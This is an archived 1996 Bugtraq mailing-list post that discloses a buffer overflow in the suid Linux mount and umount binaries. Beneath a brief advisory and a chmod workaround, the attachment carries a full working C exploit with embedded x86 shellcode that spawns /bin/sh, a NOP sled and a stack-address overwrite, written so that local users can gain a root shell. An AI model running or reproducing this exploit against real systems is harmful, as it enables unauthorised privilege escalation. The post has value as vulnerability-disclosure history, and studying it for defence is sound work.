From proff Wed Aug 14 07:43:24 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id HAA20273 for best-of-security; Wed, 14 Aug 1996 07:43:23 +1000 Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id QAA02993 for ; Tue, 13 Aug 1996 16:55:59 +1000 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <24834-15996>; Tue, 13 Aug 1996 02:54:28 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id CAA02779; Tue, 13 Aug 1996 02:52:41 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 242548 for BUGTRAQ@NETSPACE.ORG; Tue, 13 Aug 1996 02:46:14 +2000 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id CAA02251 for ; Tue, 13 Aug 1996 02:45:39 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from crimelab.com (crimelab.com [198.64.127.1]) by netspace.org (8.7/8.6.12) with ESMTP id AAA22715 for ; Tue, 13 Aug 1996 00:11:16 -0400 Received: from COViN.IL (ts014p14.pop9a.netvision.net.il [194.90.5.16]) by crimelab.com (8.7.1/8.6.4) with ESMTP id VAA02932 for ; Mon, 12 Aug 1996 21:53:38 -0600 (MDT) Received: from COViN (localhost [127.0.0.1]) by COViN.IL (8.7.5/8.7.3) with SMTP id HAA02263 for ; Tue, 13 Aug 1996 07:04:31 +0200 X-Mailer: Mozilla 3.0b5a (X11; I; Linux 2.0.0 i586) MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="------------2F3F790C537451604439D8BF" Approved-By: root@COVIN.IL.CRIMELAB.COM Message-ID: <32100CD9.33FBC5AF@mymail.com> Date: Tue, 13 Aug 1996 07:04:25 +0200 Reply-To: Bugtraq List Sender: proff From: bloodmask Organization: CoViN Subject: Vulnrability in all known Linux distributions X-To: bugtraq@crimelab.com To: Multiple recipients of list BUGTRAQ This is a multi-part message in MIME format. --------------2F3F790C537451604439D8BF Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Greetings, Well folks, After all the other security issues in Linux, I can't say I'm really that shocked about this one, anyway, read the officail covin release. After finding this one, we at covin decided it's time to put and end to this issue, and we've begun scanning all of Linux's suid binaries for other hints of these hidden "features", Results will be released soon. The reason we are also releasing the exploit, an act which may seem highly inresponsable, is due to previous expieriance that making the exploit widely available, ussually speeds up the proccess of patching up stupid vulnerabilities like these. BTW, This is kind of out of topic, but I figure, there's nothing wrong with killing two birds with one stone... Ijust noticed when installing the latest version of the shadow suite, taken from sunsite, that it "unpatched" the lib enviorment vulnerability on my system. I haven't had the time to determine *HOW* it exposed my system, but it would be wise to check up on this matter. --------------2F3F790C537451604439D8BF Content-Type: text/plain; charset=us-ascii; name="cvnmount.exploit" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="cvnmount.exploit" Covin Security Releases: (mount bufferoverflow exploit v1.0) Tested operated systems: All current distributions of Linux Affect: Local users on systems affected can gain overflow mounts syntax buffer and execute a shell by overwriting the stack. Affected binaries: (/bin/mount and /bin/umount) Workaround: On all current distributions of Linux remove suid bit of /bin/mount and /bin/umount. [chmod -s /bin/mount;chmod -s /bin/umount] Remarks: For gods sake, how many more times are we gonna see this kind of problem? It's been with Linux since it's very beggining, and it's so easy to exploit. Similiar buffer overflow vulnerabilities have been found in Linux distributions many times before, splitvt, dip, just to name a few examples. Any remarks, notes or other forms of feedback may be redirected to: bloodmask@mymail.com <------------------------------[ Cut here ]----------------------------------> /* Mount Exploit for Linux, Jul 30 1996 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````""::::::::: :::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`:::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ :::::: ::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ :::::: :::::::...........:::...........:::...........::.......:......:.......:::::: :::::::::::::::::::::::::::::::::::::::::::::::;:::::::::::::::::::::::::::: Discovered and Coded by Bloodmask & Vio Covin Security 1996 */ #include #include #include #include #include #define PATH_MOUNT "/bin/umount" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 u_long get_esp() { __asm__("movl %esp, %eax"); } main(int argc, char **argv) { u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh"; char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i; int ofs = DEFAULT_OFFSET; buff = malloc(4096); if(!buff) { printf("can't allocate memory\n"); exit(0); } ptr = buff; /* fill start of buffer with nops */ memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell)); ptr += BUFFER_SIZE-strlen(execshell); /* stick asm code into the buffer */ for(i=0;i < strlen(execshell);i++) *(ptr++) = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (8/4);i++) *(addr_ptr++) = get_esp() + ofs; ptr = (char *)addr_ptr; *ptr = 0; (void)alarm((u_int)0); printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n"); execl(PATH_MOUNT, "mount", buff, NULL); } --------------2F3F790C537451604439D8BF--